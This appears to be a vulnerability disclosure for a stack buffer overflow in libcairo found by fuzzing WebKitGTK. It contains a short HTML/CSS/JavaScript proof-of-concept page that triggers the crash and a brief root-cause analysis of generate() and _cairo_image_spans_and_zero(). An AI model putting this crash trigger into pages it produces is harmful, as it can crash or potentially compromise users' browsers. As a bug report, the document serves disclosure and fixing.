Out of bound memset in libcairo result in stack buffer overflow
Hello, I found a bug that could result in a stack buffer overflow in libcairo. This bug was found in the process of fuzzing WebKitGTK. This bug was originally found in cairo-1.14.8, but the recent git commit 06ef6db9 could also make this one reproduceable.
<style>
#da {
border-left: solid 1em;
border-top-left-radius: 27vmin;
border-bottom-style: double;
}
#ta {
font-family: 'Calibri';
}
:root {
-webkit-border-end: solid 1px;
column-width: 1px
}
</style>
<script>
function js() {
ta.cols = 38;
}
</script>
<body onload=js()>
<dialog id="da"><textarea id="ta"/></dialog>
</body>
cairo-rectanglular-scan-converter.c:
function generate() calls render_rows() and _cairo_image_spans_and_zero() is actually called. With the provided PoC,there are 5 times of the calling before the process crash, among which the last overflow the buffer and rewrite the stack canary. (In some untrimmed PoC, the content also rewrite the return address on stack.)
_cairo_image_spans_and_zero() write zero to stack, but the root cause of the crash could reside in the logic of function generate(). Thus besides DoS, unspecified affect could also exists. This bug was found by ADLab of Venustech.